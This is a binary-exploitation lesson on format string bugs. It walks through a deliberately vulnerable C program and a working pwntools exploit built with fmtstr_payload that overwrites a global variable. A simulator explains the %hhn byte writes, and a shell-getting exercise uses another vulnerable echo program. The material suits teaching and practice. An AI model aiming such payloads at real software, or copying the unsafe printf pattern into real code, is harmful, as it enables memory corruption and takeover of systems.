
# 11. Format String Vulnerabilities

### Format String Vulnerabilities

Yes, I know this is a really cliché topic, but I am only covering one cool thing you can do with pwntools. That's all, I promise. We will be looking at this simple program, which is vulnerable to a format string attack because `printf(buffer)` passes user input straight through as the format string. The goal is to modify the token so that it contains 0xcafebabe when the check occurs.

```c
#include <stdio.h>
#include <stdlib.h>

unsigned int token = 0xdeadbeef;   /* global, so it lives at a fixed address in .data */

int main() {
    char buffer[200];
    scanf("%199s", buffer);        /* bounded read, so no overflow here */
    printf(buffer);                /* BUG: user input is used as the format string */
    printf("\nToken = 0x%x\n", token);
    if (token == 0xcafebabe) {
        puts("Winner!");
    }
    else {
        puts("Loser!");
    }
    return 0;
}
```

After playing around with the program, we find that the first format argument we control (the start of our own buffer on the stack) is at offset 5: `%5$x` prints back the `AAAA` we sent as `41414141`.

```
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ ../build/2_overwrite
AAAA%5$x
AAAA41414141
Token = 0xdeadbeef
Loser!
```

Next, we need the address of the token.

```
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ nm ../build/2_overwrite | grep token
0804a028 D token
```

Now we can write our exploit script. Pwntools has a format string payload generator, `fmtstr_payload`, so we can beat the binary in a few quick lines.

```python
#!/usr/bin/env python3

from pwn import *

token_addr = 0x0804a028  # address of the global "token", taken from nm above

def main():
    p = process("../build/2_overwrite")
    # offset 5 is the first printf argument we control; write 0xcafebabe to token
    payload = fmtstr_payload(5, {token_addr: 0xcafebabe})
    log.info("Sending payload: %s" % payload)
    p.sendline(payload)

    data = p.recvall()
    # pwntools returns bytes; drop the echoed payload and keep the verdict
    realdata = data[data.find(b"Token"):]
    log.success(realdata.decode(errors="replace"))

if __name__ == "__main__":
    main()
```

Running the script:

```
ubuntu@ubuntu-xenial:/vagrant/lessons/13_fmt_str/scripts$ python 1_overwrite_token.py
[+] Starting local process '../build/2_overwrite': Done
[*] Sending payload: (�)�*�+�%174c%5$hhn%252c%6$hhn%68c%7$hhn%204c%8$hhn
[▁] Receiving all data: 0B
[+] Receiving all data: Done (742B)
[+] Token = 0xcafebabe
    Winner!
```
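To see why those odd padding widths produce 0xcafebabe, here is an added example (not part of the original lesson or of pwntools) that walks a captured format string the way printf does, tracking the character counter that each `%hhn` stores. The sample string is the one printed by the run above; the 16-byte prefix length stands in for the four target addresses pwntools placed in front of it, and the function names are my own.

```python
import re

# One printf conversion: optional positional "N$", optional width, optional
# length modifier, conversion character. Flags and precision are left out;
# the pwntools output above uses neither.
CONVERSION = re.compile(r"%(?:(\d+)\$)?(\d*)(hh|h|ll|l)?([cdiouxXsn%])")

# Bits stored by each %n variant (32-bit target, as in the page's binary).
WRITE_MASK = {"hh": 0xff, "h": 0xffff, None: 0xffffffff,
              "l": 0xffffffff, "ll": 0xffffffffffffffff}

# Constructed sample: the format part of the payload from the run above.
ADDR_BYTES = 16   # four 4-byte addresses printed verbatim before the format
SAMPLE_FMT = "%174c%5$hhn%252c%6$hhn%68c%7$hhn%204c%8$hhn"


def simulate_writes(fmt, prefix_len=0):
    """Predict every %n-family write as (argument_index, byte_width, value).

    prefix_len is how many characters printf already emitted before the
    first conversion. Non-%n conversions are assumed to print exactly their
    field width (exact for %c, a lower bound for %d/%x whose length depends
    on the argument value).
    """
    printed, next_arg, pos, writes = prefix_len, 1, 0, []
    for m in CONVERSION.finditer(fmt):
        printed += m.start() - pos          # literal text between conversions
        pos = m.end()
        positional, width, length, conv = m.groups()
        if conv == "%":
            printed += 1
            continue
        arg = int(positional) if positional else next_arg
        if not positional:
            next_arg += 1
        if conv == "n":
            mask = WRITE_MASK[length]
            writes.append((arg, mask.bit_length() // 8, printed & mask))
        else:
            printed += max(int(width) if width else 0, 1)
    return writes


def reconstruct_value(writes, base_arg, nbytes=4):
    """Combine single-byte writes to slots base_arg..base_arg+nbytes-1 into
    the little-endian integer they leave in memory (slot i -> target+i)."""
    value = 0
    for arg, width, val in writes:
        if width == 1 and 0 <= arg - base_arg < nbytes:
            value |= val << (8 * (arg - base_arg))
    return value


def writes_memory(untrusted):
    """Detection helper: would this input make printf write to memory?"""
    return any(m.group(4) == "n" for m in CONVERSION.finditer(untrusted))
```

The counter passes 190, 442, 510 and 714, whose low bytes are 0xbe, 0xba, 0xfe and 0xca, written to `token`, `token+1`, `token+2` and `token+3` respectively.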

### Exercises

#### Ex 13.1: Echoes

Before you continue on to the more advanced exercises, here's something to tackle. The source code for this challenge is given:

```c
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>

int main() {
    setvbuf(stdin, NULL, _IONBF, 0);    /* unbuffered I/O so output is not held back over a socket */
    setvbuf(stdout, NULL, _IONBF, 0);
    char echoed[1000] = {0};
    char number[200];
    int times;
    int i;
    while (1) {
        read(0, echoed, 999);           /* read() does not NUL-terminate; the zeroed array does */
        puts("How many times do you want it echoed?");
        scanf("%199s", number);
        times = atoi(number);
        for (i = 0; i < times; i++) {
            printf(echoed);             /* BUG: user input used as the format string, inside a loop */
        }
    }
}
```

The binary for the exercise can be found here. The remote target is `nc localhost 1903` and the goal is to get a shell.


